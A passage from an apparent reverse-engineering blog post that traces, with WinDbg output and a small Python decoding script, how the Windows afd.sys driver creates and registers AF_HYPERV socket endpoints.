<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The second parameter of afd!AfdDispatch is the IRP:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!irp @rdx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Irp is active with 4 stacks 4 is current (= 0xffffda8529720378)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">No Mdl: System buffer=ffffda8527088910: Thread </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">ffffda8528714080</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">: Irp stack trace. </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">cmd flg cl Device File Completion-Context</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">>[IRP_MJ_CREATE(0), N/A(0)]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0 0 ffffda8527de29d0 ffffda8528bc3550 00000000-00000000 </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">\Driver\AFD</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Args: ffff908026e7b5d0 03000020 00030000 00000039</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We can confirm that this I/O request packet was sent by our application:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!thread ffffda8528714080</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">THREAD ffffda8528714080 Cid 0f74.0ca8 Teb: 0000000000ddf000 Win32Thread: ffffda85272b94e0 RUNNING on processor 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">IRP List:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85297201d0: (0006,0310) Flags: 00000884 Mdl: 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Not impersonating</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DeviceMap ffffca89863843b0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Owning Process ffffda8527121080 Image: </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">ServerExample.exe</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Attached Process N/A Image: N/A</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Wait Start TickCount 416475 Ticks: 1 (0:00:00:00.015)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Context Switch Count 3006 IdealProcessor: 0</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next, afd!AfdCreate is called; its first parameter is the same IRP. Then afd!AfdCheckTDIFilter is called.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>r – parameters of afd!AfdCheckTDIFilter</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000001</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rdx=0000000000000022 (Address Family - AF_HYPERV)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">r8=0000000000000001 </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">r9=0000000000000000</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">It searches for the address family AF_HYPERV, passed to this function as a parameter, in the AfdTdiMapping structure (6 elements, each 20h bytes in size). The structure contains references to the standard Windows network devices:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">\\Device\\Tcp</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">\\Device\\Tcp6</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">\\Device\\Udp</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">\\Device\\Udp6</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">\\Device\\RawIp</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">\\Device\\RawIp6</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">None of these devices is used for AF_HYPERV. A pointer to the AfdTdiMapping structure is returned. Next comes afd!AfdAllocateEndpoint, from which afd!AfdTlFindAndReferenceTransport is called with these parameters:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rcx=0000000000000022 (Address Family - AF_HYPERV)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">rdx=0000000000000001</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">r8=0000000000000001 </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">r9=0000000000000001</span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">This function works with the structure </span><span style="background-color: transparent; color: teal; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AfdTlTransportListHead</span><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">. </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">It is a linked list of pointers to transport objects. The instruction mov rbx, [rbx] loads the next element, and the address family AF_HYPERV (0x22) is compared with the value at [rbx+16h]; if they match, the function returns the address of that structure:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dps @rax</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6b8c0 fffff803`db337530 afd!AfdTlTransportListHead</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6b8c8 ffffda85`27dfeca0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6b8d0 00220000`00000006</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6b8d8 00000001`00000001</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6b8e0 ffffda85`27f6ba80</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6b8e8 fffff803`db95c000 hvsocket!VmbusTlProviderDispatch</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6b8f0 11d49b1a`eb004a27</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6b8f8 bc597704`50002391</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6b900 ffffda85`27f6b96c</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6b908 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6b910 62524d4e`02080006</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6b918 8ab20db4`3a180386</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dt _GUID @rax+30h – contains the GUID NPI_MS_VMBUS_MODULEID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ServerExample!_GUID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">{eb004a27-9b1a-11d4-9123-0050047759bc} </span></div>
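<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">As an added example (not code from the article), the following Python script reconstructs the fields discussed above from the quoted dps dump: the address family at offset 16h that afd!AfdTlFindAndReferenceTransport compares against AF_HYPERV, the dispatch pointer at 28h and the NPI_MS_VMBUS_MODULEID GUID at 30h. The offsets are read off the dump itself, not from a documented structure layout, and the dump text is embedded as constructed input.</span></div>

```python
"""Decode an afd transport list entry from a WinDbg `dps` dump.

Added example, not code from the original article. The field offsets
(address family at 0x16, provider dispatch at 0x28, NPI module GUID at
0x30) are assumptions taken from the dump quoted in the article, not a
documented layout.
"""
import re
import struct
import uuid

AF_HYPERV = 0x22  # address family compared at [rbx+16h] in the article

# Constructed input: the `dps @rax` output quoted in the article, with the
# symbol annotations exactly as WinDbg prints them.
DPS_OUTPUT = """\
ffffda85`27f6b8c0 fffff803`db337530 afd!AfdTlTransportListHead
ffffda85`27f6b8c8 ffffda85`27dfeca0
ffffda85`27f6b8d0 00220000`00000006
ffffda85`27f6b8d8 00000001`00000001
ffffda85`27f6b8e0 ffffda85`27f6ba80
ffffda85`27f6b8e8 fffff803`db95c000 hvsocket!VmbusTlProviderDispatch
ffffda85`27f6b8f0 11d49b1a`eb004a27
ffffda85`27f6b8f8 bc597704`50002391
ffffda85`27f6b900 ffffda85`27f6b96c
ffffda85`27f6b908 00000000`00000000
"""

# One dps line: "<addr hi>`<addr lo> <value hi>`<value lo> [symbol]"
_LINE = re.compile(
    r"^([0-9a-f]{8})`([0-9a-f]{8})\s+([0-9a-f]{8})`([0-9a-f]{8})(?:\s+(\S+))?"
)


def parse_dps(text):
    """Return (base_address, raw_bytes, {offset: symbol}) from dps output.

    dps prints one 64-bit little-endian qword per line, so the raw bytes are
    rebuilt by packing each value with '<Q' in address order.
    """
    base = None
    expected = None
    chunks = []
    symbols = {}
    for line in text.splitlines():
        m = _LINE.match(line.strip())
        if not m:
            continue
        addr = int(m.group(1) + m.group(2), 16)
        value = int(m.group(3) + m.group(4), 16)
        if base is None:
            base = addr
        elif addr != expected:
            raise ValueError(f"non-contiguous dps output at {addr:#x}")
        expected = addr + 8
        chunks.append(struct.pack("<Q", value))
        if m.group(5):
            symbols[addr - base] = m.group(5)
    if base is None:
        raise ValueError("no dps lines found")
    return base, b"".join(chunks), symbols


def decode_transport_entry(text):
    """Pull the fields the article inspects out of one transport entry."""
    base, raw, symbols = parse_dps(text)
    flink, blink = struct.unpack_from("<QQ", raw, 0)       # LIST_ENTRY at +0
    address_family = struct.unpack_from("<H", raw, 0x16)[0]  # WORD at +16h
    dispatch = struct.unpack_from("<Q", raw, 0x28)[0]        # pointer at +28h
    # A _GUID is stored with its first three fields little-endian, which is
    # exactly what uuid.UUID(bytes_le=...) expects; this reproduces `dt _GUID`.
    module_id = uuid.UUID(bytes_le=raw[0x30:0x40])
    return {
        "entry": base,
        "flink": flink,
        "flink_symbol": symbols.get(0),
        "blink": blink,
        "address_family": address_family,
        "is_hyperv": address_family == AF_HYPERV,
        "dispatch": dispatch,
        "dispatch_symbol": symbols.get(0x28),
        "module_id": "{" + str(module_id) + "}",
    }


if __name__ == "__main__":
    for key, val in decode_transport_entry(DPS_OUTPUT).items():
        shown = f"{val:#x}" if isinstance(val, int) else str(val)
        print(f"{key:16} {shown}")
```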
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next, afd!PplGenericAllocationFunction is called (it allocates the required memory; after the necessary structures are filled in, nt!NtAllocatePoolEx is called). Then nt!ObDereferenceObject is called, with the pointer to the process (ServerExample.exe) loaded into rcx:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!object @rcx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Object: ffffda8527121080 Type: (ffffda8527096f20) Process</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ObjectHeader: ffffda8527121050 (new version)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HandleCount: 8 PointerCount: 207781</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next, the global variable AfdEndpointsOpened is incremented by 1. Its value at the time of debugging:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dd afd!AfdEndpointsOpened L4</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db3378e8 000009af 00000000 00000000 00000000</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Then </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AfdEndpointListHead</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> is checked to see whether it is empty:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="34" src="https://lh3.googleusercontent.com/BCWVaK8A1Pe6ql1AfLWMgqC0jxxRS2P4SqPDJ7uTwGp6rgZLE6EMOMR4OGq6YOt3x03JK5R_GZffTHjzSZd5X2oH-KbRjeOI1JZY5jsZF7LkHQB8kXFe3Na7Mv0KTYN7PSPd_PeaOcVjyC7-xA" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="206" /></span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Then the new element is inserted into this structure:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="72" src="https://lh6.googleusercontent.com/sCeChdsQNG9Y12mQKgS1SkqxGHiLaSrz9Y-2hi2P_ZXnxa1dCl0R75WaG_v7Z5qk0o6MaB6n0wY_Qx8-2efDigxYIwPKbOTEmcOdXVrOQFumE5j_Uknn9Or8YAhP7yU494p-U3HD24k8cgiexg" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="152" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AfdEndpointListHead, as we saw earlier, contains the created socket objects.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In short, the purpose of afd!AfdAllocateEndpoint is to create a new _AFD_CONNECTION element (the structure name is not documented, but in Windows 2003, as far as I know, it was called exactly that) and add it to the </span><span style="background-color: transparent; color: teal; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AfdEndpointListHead </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">list.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Then the state of the socket changes (the constant 0xAFD is written into the type field):</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="51" src="https://lh4.googleusercontent.com/hBHQL5EDurvu8DoZWfApNKfsEIxpB4jf0mG95JkftLcomnSVJ6iQTaDoeJJbDT8fAIS717L7VNsHm142NaG_wD7l8nCZn23DxdsqQhaQILbBil_OR_J4aX1YTsCKKhYkvhUXOOw1RKwJSfibwg" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="186" /></span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The constants AFD, AFD1, AFD2, AFD4, AFD8, AAFD, etc. indicate the state of the connection. They do not appear to correspond to the socket states described in RFC 793 (LISTEN, SYN-SENT, SYN-RECEIVED, ESTABLISHED, FIN-WAIT-1, FIN-WAIT-2, CLOSE-WAIT, CLOSING, LAST-ACK, TIME-WAIT). The byte to the left of the constant also changes depending on the call type: 000</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">1</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd0. For example, after a bind call its value becomes 3.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
